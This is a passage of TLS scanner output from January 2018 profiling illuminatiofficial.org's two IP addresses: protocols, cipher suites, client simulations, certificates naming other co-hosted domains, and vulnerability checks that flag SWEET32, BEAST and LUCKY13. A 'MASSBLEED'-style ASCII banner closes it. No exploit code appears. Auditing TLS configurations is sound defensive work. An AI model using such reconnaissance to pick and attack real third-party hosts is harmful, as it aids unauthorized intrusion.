  2139. VULNERABLE -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
  2140.  LUCKY13 (CVE-2013-0169), experimental potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS
  2141.  RC4 (CVE-2013-2566, CVE-2015-2808) no RC4 ciphers detected (OK)
  2142.  
  2143.  
  2144.  Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength 
  2145.  
  2146. Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
  2147. -----------------------------------------------------------------------------------------------------------------------------
  2148. x1302 TLS13-AES-256-GCM-SHA384 ECDH 253 AESGCM 256 TLS_AES_256_GCM_SHA384
  2149. xcc14 ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDH 256 ChaCha20 256 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256_OLD
  2150. xcc13 ECDHE-RSA-CHACHA20-POLY1305-OLD ECDH 256 ChaCha20 256 TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256_OLD
  2151. xc030 ECDHE-RSA-AES256-GCM-SHA384 ECDH 256 AESGCM 256 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
  2152. xc02c ECDHE-ECDSA-AES256-GCM-SHA384 ECDH 256 AESGCM 256 TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
  2153. xc028 ECDHE-RSA-AES256-SHA384 ECDH 256 AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
  2154. xc024 ECDHE-ECDSA-AES256-SHA384 ECDH 256 AES 256 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384
  2155. xc014 ECDHE-RSA-AES256-SHA ECDH 256 AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
  2156. xc00a ECDHE-ECDSA-AES256-SHA ECDH 256 AES 256 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
  2157. xcca9 ECDHE-ECDSA-CHACHA20-POLY1305 ECDH 253 ChaCha20 256 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
  2158. xcca8 ECDHE-RSA-CHACHA20-POLY1305 ECDH 253 ChaCha20 256 TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256
  2159. x9d AES256-GCM-SHA384 RSA AESGCM 256 TLS_RSA_WITH_AES_256_GCM_SHA384
  2160. x3d AES256-SHA256 RSA AES 256 TLS_RSA_WITH_AES_256_CBC_SHA256
  2161. x35 AES256-SHA RSA AES 256 TLS_RSA_WITH_AES_256_CBC_SHA
  2162. x1301 TLS13-AES-128-GCM-SHA256 ECDH 253 AESGCM 128 TLS_AES_128_GCM_SHA256
  2163. xc02f ECDHE-RSA-AES128-GCM-SHA256 ECDH 256 AESGCM 128 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
  2164. xc02b ECDHE-ECDSA-AES128-GCM-SHA256 ECDH 256 AESGCM 128 TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
  2165. xc027 ECDHE-RSA-AES128-SHA256 ECDH 256 AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
  2166. xc023 ECDHE-ECDSA-AES128-SHA256 ECDH 256 AES 128 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
  2167. xc013 ECDHE-RSA-AES128-SHA ECDH 256 AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
  2168. xc009 ECDHE-ECDSA-AES128-SHA ECDH 256 AES 128 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
  2169. x9c AES128-GCM-SHA256 RSA AESGCM 128 TLS_RSA_WITH_AES_128_GCM_SHA256
  2170. x3c AES128-SHA256 RSA AES 128 TLS_RSA_WITH_AES_128_CBC_SHA256
  2171. x2f AES128-SHA RSA AES 128 TLS_RSA_WITH_AES_128_CBC_SHA
  2172. x0a DES-CBC3-SHA RSA 3DES 168 TLS_RSA_WITH_3DES_EDE_CBC_SHA
  2173.  
  2174.  
  2175.  Running client simulations via sockets 
  2176.  
  2177. Android 2.3.7 TLSv1.0 AES128-SHA
  2178. Android 4.1.1 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  2179. Android 4.3 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  2180. Android 4.4.2 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2181. Android 5.0.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
  2182. Android 6.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
  2183. Android 7.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305, 253 bit ECDH (X25519)
  2184. Chrome 51 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 253 bit ECDH (X25519)
  2185. Chrome 57 Win 7 TLSv1.3 TLS13-AES-128-GCM-SHA256, 253 bit ECDH (X25519)
  2186. Firefox 49 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2187. Firefox 53 Win 7 TLSv1.3 TLS13-AES-128-GCM-SHA256, 253 bit ECDH (X25519)
  2188. IE 6 XP No connection
  2189. IE 7 Vista TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  2190. IE 8 XP TLSv1.0 DES-CBC3-SHA
  2191. IE 8 Win 7 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  2192. IE 11 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2193. IE 11 Win 8.1 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2194. IE 11 Win Phone 8.1 Update TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2195. IE 11 Win 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2196. Edge 13 Win 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2197. Edge 13 Win Phone 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2198. Opera 17 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  2199. Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  2200. Safari 7 iOS 7.1 TLSv1.2 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  2201. Safari 9 OS X 10.11 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2202. Safari 10 OS X 10.12 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2203. Apple ATS 9 iOS 9 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2204. Tor 17.0.9 Win 7 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  2205. Java 6u45 TLSv1.0 AES128-SHA
  2206. Java 7u25 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  2207. Java 8u31 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2208. OpenSSL 1.0.1l TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2209. OpenSSL 1.0.2e TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2210.  
  2211.  Done 2018-01-05 01:21:59 [ 334s] -->> 104.24.31.26:443 (illuminatiofficial.org) <<--
  2212.  
  2213. -----------------------------------------------------
  2214.  Start 2018-01-05 01:22:00 -->> 104.24.30.26:443 (illuminatiofficial.org) <<--
  2215.  
  2216. further IP addresses: 104.24.31.26 2400:cb00:2048:1::6818:1f1a
  2217. 2400:cb00:2048:1::6818:1e1a
  2218. rDNS (104.24.30.26): --
  2219. Service detected: HTTP
  2220.  
  2221.  
  2222.  Testing protocols via sockets except SPDY+HTTP2 
  2223.  
  2224.  SSLv2 not offered (OK)
  2225.  SSLv3 not offered (OK)
  2226.  TLS 1 offered
  2227.  TLS 1.1 offered
  2228.  TLS 1.2 offered (OK)
  2229.  TLS 1.3 offered (OK): draft 18
  2230.  SPDY/NPN h2, spdy/3.1, http/1.1 (advertised)
  2231.  HTTP2/ALPN h2, spdy/3.1, http/1.1 (offered)
  2232.  
  2233.  Testing ~standard cipher categories 
  2234.  
  2235.  NULL ciphers (no encryption) not offered (OK)
  2236.  Anonymous NULL Ciphers (no authentication) not offered (OK)
  2237.  Export ciphers (w/o ADH+NULL) not offered (OK)
  2238.  LOW: 64 Bit + DES encryption (w/o export) not offered (OK)
  2239.  Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) not offered (OK)
  2240.  Triple DES Ciphers (Medium) offered
  2241.  High encryption (AES+Camellia, no AEAD) offered (OK)
  2242.  Strong encryption (AEAD ciphers) offered (OK)
  2243.  
  2244.  
  2245.  Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 
  2246.  
  2247.  PFS is offered (OK) TLS13-AES-256-GCM-SHA384
  2248. TLS13-CHACHA20-POLY1305-SHA256
  2249. ECDHE-ECDSA-CHACHA20-POLY1305-OLD
  2250. ECDHE-RSA-CHACHA20-POLY1305-OLD
  2251. ECDHE-RSA-AES256-GCM-SHA384
  2252. ECDHE-ECDSA-AES256-GCM-SHA384
  2253. ECDHE-RSA-AES256-SHA384 ECDHE-ECDSA-AES256-SHA384
  2254. ECDHE-RSA-AES256-SHA ECDHE-ECDSA-AES256-SHA
  2255. ECDHE-ECDSA-CHACHA20-POLY1305
  2256. ECDHE-RSA-CHACHA20-POLY1305
  2257. TLS13-AES-128-GCM-SHA256
  2258. ECDHE-RSA-AES128-GCM-SHA256
  2259. ECDHE-ECDSA-AES128-GCM-SHA256
  2260. ECDHE-RSA-AES128-SHA256 ECDHE-ECDSA-AES128-SHA256
  2261. ECDHE-RSA-AES128-SHA ECDHE-ECDSA-AES128-SHA
  2262.  Elliptic curves offered: secp224r1 prime256v1 secp384r1 secp521r1 X25519
  2263.  
  2264.  
  2265.  Testing server preferences 
  2266.  
  2267.  Has server cipher order? yes (OK)
  2268.  Negotiated protocol TLSv1.3
  2269.  Negotiated cipher TLS13-AES-256-GCM-SHA384, 253 bit ECDH (X25519)
  2270.  Cipher order
  2271. TLSv1: ECDHE-RSA-AES128-SHA AES128-SHA ECDHE-RSA-AES256-SHA AES256-SHA
  2272. DES-CBC3-SHA
  2273. TLSv1.1: ECDHE-RSA-AES128-SHA AES128-SHA ECDHE-RSA-AES256-SHA AES256-SHA
  2274. TLSv1.2: ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDHE-ECDSA-CHACHA20-POLY1305
  2275. ECDHE-ECDSA-AES128-GCM-SHA256 ECDHE-ECDSA-AES128-SHA
  2276. ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES256-GCM-SHA384
  2277. ECDHE-ECDSA-AES256-SHA ECDHE-ECDSA-AES256-SHA384
  2278. ECDHE-RSA-CHACHA20-POLY1305-OLD ECDHE-RSA-CHACHA20-POLY1305
  2279. ECDHE-RSA-AES128-GCM-SHA256 ECDHE-RSA-AES128-SHA
  2280. ECDHE-RSA-AES128-SHA256 AES128-GCM-SHA256 AES128-SHA
  2281. AES128-SHA256 ECDHE-RSA-AES256-GCM-SHA384 ECDHE-RSA-AES256-SHA
  2282. ECDHE-RSA-AES256-SHA384 AES256-GCM-SHA384 AES256-SHA
  2283. AES256-SHA256
  2284. TLSv1.3: TLS13-AES-256-GCM-SHA384 TLS13-CHACHA20-POLY1305-SHA256
  2285. TLS13-AES-128-GCM-SHA256
  2286.  
  2287.  
  2288.  Testing server defaults (Server Hello) 
  2289.  
  2290.  TLS extensions (standard) "renegotiation info/#65281" "server name/#0"
  2291. "session ticket/#35" "status request/#5"
  2292. "next protocol/#13172" "EC point formats/#11"
  2293. "extended master secret/#23"
  2294. "signed certificate timestamps/#18"
  2295. "application layer protocol negotiation/#16"
  2296.  Session Ticket RFC 5077 hint 64800 seconds, session tickets keys seems to be rotated < daily
  2297.  SSL Session ID support yes
  2298.  Session Resumption Tickets: yes, ID: yes
  2299.  TLS clock skew -1 sec from localtime
  2300.  
  2301. Server Certificate #1
  2302.  Signature Algorithm SHA256 with RSA
  2303.  Server key size RSA 2048 bits
  2304.  Fingerprint / Serial SHA1 0DBF827A6A853A276163B1E4C6938FED1B8A4E7A / C5D660AB733EBE7B799B3EEBD9B6BE69
  2305. SHA256 A2BF567B911769B5E0AAC0A97F1331FAB0F8E9B6AC58F2B545D0A10AEDBE0665
  2306.  Common Name (CN) ssl387739.cloudflaressl.com (CN in response to request w/o SNI: ssl387738.cloudflaressl.com)
  2307.  subjectAltName (SAN) ssl387739.cloudflaressl.com *.cdn2u.com
  2308. *.dynamo-cycling.com *.illuminati.am
  2309. *.illuminati.mp *.illuminatiofficial.org
  2310. *.invitebyvoice.com *.ipay.com.bd
  2311. *.offensivegreetingcards.com
  2312. *.pommadedivine.com *.priyo.com
  2313. *.rateareporter.com *.take2.co *.tero.com
  2314. *.tinanz.com *.vandenboss.com cdn2u.com
  2315. dynamo-cycling.com illuminati.am illuminati.mp
  2316. illuminatiofficial.org invitebyvoice.com
  2317. ipay.com.bd offensivegreetingcards.com
  2318. pommadedivine.com priyo.com rateareporter.com
  2319. take2.co tero.com tinanz.com vandenboss.com 
  2320.  Issuer COMODO RSA Domain Validation Secure Server CA 2 (COMODO CA Limited from GB)
  2321.  Trust (hostname) Ok via SAN (same w/o SNI)
  2322.  Chain of trust Ok 
  2323.  EV cert (experimental) no
  2324.  Certificate Expiration 183 >= 60 days (2017-12-28 19:00 --> 2018-07-07 19:59 -0400)
  2325.  # of certificates provided 3
  2326.  Certificate Revocation List http://crl.comodoca4.com/COMODORSADomainValidationSecureServerCA2.crl
  2327.  OCSP URI http://ocsp.comodoca4.com
  2328.  OCSP stapling offered
  2329.  OCSP must staple no
  2330.  DNS CAA RR (experimental) not offered
  2331.  Certificate Transparency yes (TLS extension)
  2332.  
  2333. Server Certificate #2
  2334.  Signature Algorithm ECDSA with SHA256
  2335.  Server key size ECDSA 256 bits
  2336.  Fingerprint / Serial SHA1 9F701364405FB97D9195EFD69D69C27A104291BA / 41D7E47FC9F7F357CE3997FC8E17A90B
  2337. SHA256 2DE9F2E20301BD8DF38206D879A9E8377D838F1FE95C9F75FDFA05AEC6ADAD60
  2338.  Common Name (CN) ssl387740.cloudflaressl.com (CN in response to request w/o SNI: ssl387738.cloudflaressl.com)
  2339.  subjectAltName (SAN) ssl387740.cloudflaressl.com *.cdn2u.com
  2340. *.dynamo-cycling.com *.illuminati.am
  2341. *.illuminati.mp *.illuminatiofficial.org
  2342. *.invitebyvoice.com *.ipay.com.bd
  2343. *.offensivegreetingcards.com
  2344. *.pommadedivine.com *.priyo.com
  2345. *.rateareporter.com *.take2.co *.tero.com
  2346. *.tinanz.com *.vandenboss.com cdn2u.com
  2347. dynamo-cycling.com illuminati.am illuminati.mp
  2348. illuminatiofficial.org invitebyvoice.com
  2349. ipay.com.bd offensivegreetingcards.com
  2350. pommadedivine.com priyo.com rateareporter.com
  2351. take2.co tero.com tinanz.com vandenboss.com 
  2352.  Issuer COMODO ECC Domain Validation Secure Server CA 2 (COMODO CA Limited from GB)
  2353.  Trust (hostname) Ok via SAN (same w/o SNI)
  2354.  Chain of trust Ok 
  2355.  EV cert (experimental) no
  2356.  Certificate Expiration 183 >= 60 days (2017-12-28 19:00 --> 2018-07-07 19:59 -0400)
  2357.  # of certificates provided 3
  2358.  Certificate Revocation List http://crl.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crl
  2359.  OCSP URI http://ocsp.comodoca4.com
  2360.  OCSP stapling offered
  2361.  OCSP must staple no
  2362.  DNS CAA RR (experimental) not offered
  2363.  Certificate Transparency yes (TLS extension)
  2364.  
  2365. Server Certificate #3 (in response to request w/o SNI)
  2366.  Signature Algorithm SHA1 with RSA -- besides: users will receive a strong browser WARNING
  2367.  Server key size RSA 2048 bits
  2368.  Fingerprint / Serial SHA1 584B9525D5B6DF06A0930B8F110E1B6A92365B7B / D0C35F1955803E6CD53F0F31CAABA085
  2369. SHA256 C09585C561533855DCE3786C0A26DBAE301E4C11FF152E9EFEEEF48AF25C9B6D
  2370.  Common Name (CN) ssl387738.cloudflaressl.com
  2371.  subjectAltName (SAN) ssl387738.cloudflaressl.com *.cdn2u.com
  2372. *.dynamo-cycling.com *.illuminati.am
  2373. *.illuminati.mp *.illuminatiofficial.org
  2374. *.invitebyvoice.com *.ipay.com.bd
  2375. *.offensivegreetingcards.com
  2376. *.pommadedivine.com *.priyo.com
  2377. *.rateareporter.com *.take2.co *.tero.com
  2378. *.tinanz.com *.vandenboss.com cdn2u.com
  2379. dynamo-cycling.com illuminati.am illuminati.mp
  2380. illuminatiofficial.org invitebyvoice.com
  2381. ipay.com.bd offensivegreetingcards.com
  2382. pommadedivine.com priyo.com rateareporter.com
  2383. take2.co tero.com tinanz.com vandenboss.com 
  2384.  Issuer COMODO Domain Validation Legacy Server CA 2 (COMODO CA Limited from GB)
  2385.  Trust (hostname) Ok via SAN
  2386.  Chain of trust NOT ok: Linux (chain incomplete) Microsoft (chain incomplete) Mozilla (chain incomplete)
  2387. OK: Apple 
  2388.  EV cert (experimental) no
  2389.  Certificate Expiration 183 >= 60 days (2017-12-28 19:00 --> 2018-07-07 19:59 -0400)
  2390.  # of certificates provided 2
  2391.  Certificate Revocation List http://crl.comodoca4.com/COMODODomainValidationLegacyServerCA2.crl
  2392.  OCSP URI http://ocsp.comodoca4.com
  2393.  OCSP stapling offered
  2394.  OCSP must staple no
  2395.  DNS CAA RR (experimental) not offered
  2396.  Certificate Transparency yes (TLS extension)
  2397.  
  2398.  
  2399.  Testing HTTP header response @ "/" 
  2400.  
  2401.  HTTP Status Code  301 Moved Permanently, redirecting to "https://www.illuminatiofficial.org/"
  2402.  HTTP clock skew 0 sec from localtime
  2403.  Strict Transport Security --
  2404.  Public Key Pinning --
  2405.  Server banner cloudflare-nginx
  2406.  Application banner X-Powered-By(B: HHVM/3(B.2(B3(B.2(B
  2407.  Cookie(s) 2 issued: NONE secure, 1/2 HttpOnly -- maybe better try target URL of 30x
  2408.  Security headers X-Content-Type-Options nosniff
  2409.  Reverse Proxy banner --
  2410.  
  2411.  
  2412.  Testing vulnerabilities 
  2413.  
  2414.  Heartbleed (CVE-2014-0160) not vulnerable (OK), no heartbeat extension
  2415.  CCS (CVE-2014-0224) not vulnerable (OK)
  2416.  Ticketbleed (CVE-2016-9244), experiment. not vulnerable (OK)
  2417.  ROBOT not vulnerable (OK)
  2418.  Secure Renegotiation (CVE-2009-3555) not vulnerable (OK)
  2419.  Secure Client-Initiated Renegotiation not vulnerable (OK)
  2420.  CRIME, TLS (CVE-2012-4929) not vulnerable (OK)
  2421.  BREACH (CVE-2013-3587) no HTTP compression (OK)  - only supplied "/" tested
  2422.  POODLE, SSL (CVE-2014-3566) not vulnerable (OK)
  2423.  TLS_FALLBACK_SCSV (RFC 7507) Downgrade attack prevention supported (OK)
  2424.  SWEET32 (CVE-2016-2183, CVE-2016-6329) VULNERABLE, uses 64 bit block ciphers
  2425.  FREAK (CVE-2015-0204) not vulnerable (OK)
  2426.  DROWN (CVE-2016-0800, CVE-2016-0703) not vulnerable on this host and port (OK)
  2427. make sure you don't use this certificate elsewhere with SSLv2 enabled services
  2428. https://censys.io/ipv4?q=A2BF567B911769B5E0AAC0A97F1331FAB0F8E9B6AC58F2B545D0A10AEDBE0665 could help you to find out
  2429.  LOGJAM (CVE-2015-4000), experimental not vulnerable (OK): no DH EXPORT ciphers, no DH key detected
  2430.  BEAST (CVE-2011-3389) TLS1: ECDHE-RSA-AES128-SHA
  2431. AES128-SHA
  2432. ECDHE-RSA-AES256-SHA
  2433. AES256-SHA DES-CBC3-SHA 
  2434. VULNERABLE -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
  2435.  LUCKY13 (CVE-2013-0169), experimental potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS
  2436.  RC4 (CVE-2013-2566, CVE-2015-2808) no RC4 ciphers detected (OK)
  2437.  
  2438.  
  2439.  Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength 
  2440.  
  2441. Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
  2442. -----------------------------------------------------------------------------------------------------------------------------
  2443. x1302 TLS13-AES-256-GCM-SHA384 ECDH 253 AESGCM 256 TLS_AES_256_GCM_SHA384
  2444. xcc14 ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDH 256 ChaCha20 256 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256_OLD
  2445. xcc13 ECDHE-RSA-CHACHA20-POLY1305-OLD ECDH 256 ChaCha20 256 TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256_OLD
  2446. xc030 ECDHE-RSA-AES256-GCM-SHA384 ECDH 256 AESGCM 256 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
  2447. xc02c ECDHE-ECDSA-AES256-GCM-SHA384 ECDH 256 AESGCM 256 TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
  2448. xc028 ECDHE-RSA-AES256-SHA384 ECDH 256 AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
  2449. xc024 ECDHE-ECDSA-AES256-SHA384 ECDH 256 AES 256 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384
  2450. xc014 ECDHE-RSA-AES256-SHA ECDH 256 AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
  2451. xc00a ECDHE-ECDSA-AES256-SHA ECDH 256 AES 256 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
  2452. xcca9 ECDHE-ECDSA-CHACHA20-POLY1305 ECDH 253 ChaCha20 256 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
  2453. xcca8 ECDHE-RSA-CHACHA20-POLY1305 ECDH 253 ChaCha20 256 TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256
  2454. x9d AES256-GCM-SHA384 RSA AESGCM 256 TLS_RSA_WITH_AES_256_GCM_SHA384
  2455. x3d AES256-SHA256 RSA AES 256 TLS_RSA_WITH_AES_256_CBC_SHA256
  2456. x35 AES256-SHA RSA AES 256 TLS_RSA_WITH_AES_256_CBC_SHA
  2457. x1301 TLS13-AES-128-GCM-SHA256 ECDH 253 AESGCM 128 TLS_AES_128_GCM_SHA256
  2458. xc02f ECDHE-RSA-AES128-GCM-SHA256 ECDH 256 AESGCM 128 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
  2459. xc02b ECDHE-ECDSA-AES128-GCM-SHA256 ECDH 256 AESGCM 128 TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
  2460. xc027 ECDHE-RSA-AES128-SHA256 ECDH 256 AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
  2461. xc023 ECDHE-ECDSA-AES128-SHA256 ECDH 256 AES 128 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
  2462. xc013 ECDHE-RSA-AES128-SHA ECDH 256 AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
  2463. xc009 ECDHE-ECDSA-AES128-SHA ECDH 256 AES 128 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
  2464. x9c AES128-GCM-SHA256 RSA AESGCM 128 TLS_RSA_WITH_AES_128_GCM_SHA256
  2465. x3c AES128-SHA256 RSA AES 128 TLS_RSA_WITH_AES_128_CBC_SHA256
  2466. x2f AES128-SHA RSA AES 128 TLS_RSA_WITH_AES_128_CBC_SHA
  2467. x0a DES-CBC3-SHA RSA 3DES 168 TLS_RSA_WITH_3DES_EDE_CBC_SHA
  2468.  
  2469.  
  2470.  Running client simulations via sockets 
  2471.  
  2472. Android 2.3.7 TLSv1.0 AES128-SHA
  2473. Android 4.1.1 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  2474. Android 4.3 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  2475. Android 4.4.2 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2476. Android 5.0.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
  2477. Android 6.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
  2478. Android 7.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305, 253 bit ECDH (X25519)
  2479. Chrome 51 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 253 bit ECDH (X25519)
  2480. Chrome 57 Win 7 TLSv1.3 TLS13-AES-128-GCM-SHA256, 253 bit ECDH (X25519)
  2481. Firefox 49 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2482. Firefox 53 Win 7 TLSv1.3 TLS13-AES-128-GCM-SHA256, 253 bit ECDH (X25519)
  2483. IE 6 XP No connection
  2484. IE 7 Vista TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  2485. IE 8 XP TLSv1.0 DES-CBC3-SHA
  2486. IE 8 Win 7 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  2487. IE 11 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2488. IE 11 Win 8.1 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2489. IE 11 Win Phone 8.1 Update TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2490. IE 11 Win 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2491. Edge 13 Win 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2492. Edge 13 Win Phone 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2493. Opera 17 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  2494. Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  2495. Safari 7 iOS 7.1 TLSv1.2 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  2496. Safari 9 OS X 10.11 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2497. Safari 10 OS X 10.12 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2498. Apple ATS 9 iOS 9 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2499. Tor 17.0.9 Win 7 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  2500. Java 6u45 TLSv1.0 AES128-SHA
  2501. Java 7u25 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  2502. Java 8u31 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2503. OpenSSL 1.0.1l TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2504. OpenSSL 1.0.2e TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2505.  
  2506.  Done 2018-01-05 01:27:28 [ 663s] -->> 104.24.30.26:443 (illuminatiofficial.org) <<--
  2507.  
  2508. -----------------------------------------------------
  2509. Done testing now all IP addresses (on port 443): 104.24.31.26 104.24.30.26
  2510.  
  2511.  
  2512. ███▄ ▄███▓ ▄▄▄ ██████ ██████ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄ 
  2513. ▓██▒▀█▀ ██▒▒████▄ ▒██ ▒ ▒██ ▒ ▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌
  2514. ▓██ ▓██░▒██ ▀█▄ ░ ▓██▄ ░ ▓██▄ ▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌
  2515. ▒██ ▒██ ░██▄▄▄▄██ ▒ ██▒ ▒ ██▒▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌
  2516. ▒██▒ ░██▒ ▓█ ▓██▒▒██████▒▒▒██████▒▒░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓ 
  2517. ░ ▒░ ░ ░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒ 
  2518. ░ ░ ░ ▒ ▒▒ ░░ ░▒ ░ ░░ ░▒ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒ 
